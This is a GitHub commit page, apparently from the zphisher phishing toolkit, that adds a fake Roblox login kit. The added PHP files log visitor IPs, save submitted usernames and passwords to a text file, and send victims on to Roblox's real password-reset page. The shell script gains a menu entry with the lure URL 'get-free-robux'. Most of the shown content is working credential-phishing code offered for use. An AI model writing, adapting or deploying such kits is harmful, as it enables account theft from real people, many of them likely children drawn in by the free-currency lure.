Skip to content

Commit 03d2c36

Browse files
authored
Added Roblox
1 parent 54d0b6d commit 03d2c36

File tree

5 files changed

+217
-1
lines changed

5 files changed

+217
-1
lines changed

.sites/roblox/favicon.ico

4.31 KB
Binary file not shown.

.sites/roblox/index.php

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
<?php
2+
include 'ip.php';
3+
header('Location: login.html');
4+
exit
5+
?>

.sites/roblox/login.html

Lines changed: 201 additions & 0 deletions
Large diffs are not rendered by default.

.sites/roblox/login.php

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
<?php
2+
3+
file_put_contents("usernames.txt", "Roblox Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
4+
header('Location: https://www.roblox.com/login/forgot-password-or-username/');
5+
exit();
6+
?>

zphisher.sh

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -794,7 +794,7 @@ main_menu() {
794794
${RED}[${WHITE}09${RED}]${ORANGE} Playstation ${RED}[${WHITE}19${RED}]${ORANGE} Reddit ${RED}[${WHITE}29${RED}]${ORANGE} Vk
795795
${RED}[${WHITE}10${RED}]${ORANGE} Tiktok ${RED}[${WHITE}20${RED}]${ORANGE} Adobe ${RED}[${WHITE}30${RED}]${ORANGE} XBOX
796796
${RED}[${WHITE}31${RED}]${ORANGE} Mediafire ${RED}[${WHITE}32${RED}]${ORANGE} Gitlab ${RED}[${WHITE}33${RED}]${ORANGE} Github
797-
${RED}[${WHITE}34${RED}]${ORANGE} Discord
797+
${RED}[${WHITE}34${RED}]${ORANGE} Discord ${RED}[${WHITE}35${RED}]${ORANGE} Roblox
798798
799799
${RED}[${WHITE}99${RED}]${ORANGE} About ${RED}[${WHITE}00${RED}]${ORANGE} Exit
800800
@@ -931,6 +931,10 @@ main_menu() {
931931
website="discord"
932932
mask='https://get-discord-nitro-free'
933933
tunnel_menu;;
934+
35)
935+
website="roblox"
936+
mask='https://get-free-robux'
937+
tunnel_menu;;
934938
99)
935939
about;;
936940
0 | 00 )

0 commit comments

Comments
 (0)